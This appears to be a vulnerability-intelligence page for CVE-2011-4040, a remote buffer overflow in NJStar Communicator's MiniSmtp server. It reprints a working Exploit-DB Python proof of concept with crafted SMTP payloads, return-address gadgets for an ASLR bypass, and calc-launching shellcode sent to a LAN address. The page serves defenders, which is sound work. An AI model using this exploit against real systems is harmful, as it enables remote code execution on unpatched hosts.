VIR Vulnerability Intelligence Relay

CVE-2011-4040

critical
Published 2011-11-21 ยท Modified 2026-04-29
๐Ÿ’ฌ Discuss on Community โœš Propose mitigation
CVSS v3
โ€”
CVSS v4 NEW
โ€”
not yet in upstream
VIR risk
10.0

Description

Buffer overflow in MiniSmtp 3.0.11818 in NJStar Communicator allows remote attackers to execute arbitrary code via a crafted packet.

Predictions

Exploit likelihood
20%
Patch ETA
โ€”

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ€” if you've already worked around this in production โ€” publish your fix to the community-verified tier.

โœš Propose a mitigation on Community โ†’ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-18196 dos windows python ยท 2 KB
Zune ยท 2011-12-03

NJStar Communicator MiniSmtp - Buffer Overflow (ASLR Bypass)

python exploit Source: Exploit-DB 
# Exploit Title: NJStart Communicator MiniSmtp Buffer Overflow [ASLR Bypass]
# Date: 02/12/11
# Author: Zune - Julian Pulido
# Software Link: http://www.njstar.com/download/njcom.exe
# Version: 3.0
# Build: 11818 and previous  
# Tested on: Windows 7 Ultimate
# CVE:2011-4040


#! /usr/local/bin/python

import socket
import time

carriage= chr(0xd) 
#######################################
Padding1= chr(0x31)* 275
Jump= '\x8d\x44\x24\x80\xff\xe0\x90\x90'
Junk1= chr(0x90)* 4
return1= '\x2d\x12\x41' # pop retn
egg1= Padding1+Jump+Junk1+return1+carriage 

#######################################
Padding2= chr(0x32)* 271
return2= '\x2b\x12\x41' # pop pop pop retn
egg2= Padding2+return2+carriage

#######################################
Padding3= chr(0x33) * 263
return3= '\x2d\x12\x41' # pop retn
egg3= Padding3+return3+carriage

#######################################
Padding4= chr(0x34) * 171
Padding5= chr(0x34) * 22
ShellCode = "\xC7\x43\x20\x63\x61\x6C\x63\xC7\x43\x24\x2E\x65\x78\x65\x33\xC0\
\x66\xB8\x1A\x08\xC1\xE0\x08\xB0\x79\x03\xE8\x8D\x43\x20\x33\xC9\xB1\x01\xC1\
\xC1\x0C\x2B\xE1\x6A\x05\x50\xFF\xD5\x8D\x85\x85\x44\xF8\xFF\x6A\x01\xFF\xD0"

return4= '\x2b\x12\x41' # pop pop pop retn
egg4= Padding4+ShellCode+Padding5+return4+carriage

#######################################

def Send_SMTP (egg):
    connectionx.send(egg +'\n')
    time.sleep(2)
    
connectionx = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

print "Exploit NJStar Communicator 3.0 MiniSmtp by Zune\n"
print "Windows 7 Ultimate [ASLR Bypass]"
try:
    connectionx.connect(("192.168.1.65",25))#SMTP port 25
    Send_SMTP(egg1)
    Send_SMTP(egg2)
    Send_SMTP(egg3)
    Send_SMTP(egg4)
    connectionx.close()
except socket.error:
    print "it couldn't connect"
    time.sleep(2)
EDB-18057 remote windows verified
Dillon Beresford ยท 2011-10-31

NJStar Communicator 3.00 - MiniSMTP Server Remote (Metasploit)

Source code queued for fetch โ€” refresh in a moment.

Metasploit modules

exploit_windows/smtp/njstar_smtp_bof rank 300
NJStar Communicator 3.00 MiniSMTP Buffer Overflow
Source fetch failed: fetch_error โ€” view the original via the link above.

Application impact
VendorProductVersionsFixed
njstarnjstar_communicator3.0.11818

References

CWEs

CWE-119

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.